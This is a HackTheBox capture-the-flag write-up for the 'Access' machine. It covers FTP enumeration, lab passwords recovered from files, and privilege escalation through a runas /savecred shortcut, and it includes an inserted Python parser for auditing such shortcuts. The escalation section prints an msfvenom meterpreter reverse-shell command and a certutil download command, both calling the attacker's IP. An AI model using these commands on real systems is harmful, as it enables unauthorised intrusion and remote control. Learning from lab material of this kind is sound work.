Hackthebox: Access write-up

Recon and enumeration

21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Starting off the box with a typical nmap scan, we see that anonymous login is allowed on the FTP server, so that is the first thing to check. Log in with the user ‘anonymous’ and just press enter for the password.

Inside there are a couple of files, ‘backup.mdb’ and ‘access control.zip’, the latter of which is password protected. Opening the mdb file reveals an engineer’s password, ‘access4u@security’, which is the password for the zip; the zip in turn contains an Outlook file. Inside that there is another password, ‘4Cc3ssC0ntr0ller’, for the ‘security’ account, which can be used to log in over telnet.

This gives us the user flag, so now it’s time for some privilege escalation.

Privilege escalation

I got stuck in a bit of a rabbit hole with this one, following a trail that I was hopeful might lead to something cool with the application ‘yawcam’ installed; it turns out I needed to think a bit more basic.

On the desktop of the user ‘Public’ there was a .lnk file that had this inside it:

(binary .lnk contents; only the readable strings are kept)
C:\Windows\System32\runas.exe
..\..\..\Windows\System32\runas.exe
C:\ZKTeco\ZKAccess3.5
/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"
C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico
%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico
S-1-5-21-953262931-566350628-63446256-500


Key part of this being: ‘runas /user:ACCESS\Administrator /savecred’
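As an added example (not code from the write-up), here is a small Python parser for the StringData section of a Windows Shell Link (.lnk) file that pulls out the relative target, working directory and arguments and flags any shortcut that launches runas.exe with /savecred, which is the check a defender would run across user desktops. The layout is assumed to follow the MS-SHLLINK specification, and the sample shortcut is constructed inline from the strings found on the box.

```python
import struct
# Added example (not the write-up's code): parse the StringData of a Windows
# Shell Link (.lnk) per MS-SHLLINK and flag shortcuts that run runas /savecred.
(HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH,
 HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE) = (1 << i for i in range(8))
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location")]
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

def parse_lnk_strings(data: bytes) -> dict:
    """Read the header, skip IDList/LinkInfo, decode the StringData fields."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link: bad HeaderSize")
    flags = struct.unpack_from("<I", data, 0x14)[0]   # LinkFlags
    pos = 0x4C
    if flags & HAS_IDLIST:        # IDListSize (uint16) then the item IDs
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:      # LinkInfoSize (uint32) includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for bit, key in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return fields

def uses_savecred(fields: dict) -> bool:
    """True when the shortcut launches runas.exe with stored credentials."""
    target = fields.get("relative_path", "").lower()
    args = fields.get("arguments", "").lower()
    return target.endswith("runas.exe") and "/savecred" in args

def build_lnk(relative_path: str, working_dir: str, arguments: str) -> bytes:
    """Constructed sample: a unicode .lnk holding only StringData (no IDList/LinkInfo)."""
    flags = HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, flags).ljust(0x4C, b"\0")
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body

# Constructed sample built from the strings in the shortcut found on the box.
SAMPLE = build_lnk(r"..\..\..\Windows\System32\runas.exe", r"C:\ZKTeco\ZKAccess3.5",
                   r'/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"')
```

A fuller audit would also read the absolute target out of the LinkInfo block and pair the hit with `cmdkey /list` on the host, since /savecred only matters when a credential for that account is actually stored.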

This meant I could upload a reverse shell and, by using the /savecred option when I run the exe file, have it run as the administrator. Fire up msfvenom and create the binary with:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=9998 -f exe > shell.exe

I then had some trouble getting the actual exe file onto the server, but after some googling I found out I could use ‘certutil’ to get the file on there with this command:

certutil -urlcache -split -f http://10.10.14.7:8000/shell.exe shell.exe

From here I just had to ‘runas’ the malicious exe file with ‘/savecred’ added to the command and start up a listener on my attacking box, and from there we are now the admin 🙂

Closing thoughts

This one was pretty easy, but I learned a new way to upload files onto a server, and ‘readpst’ on Linux for reading Outlook files is also pretty cool. gg!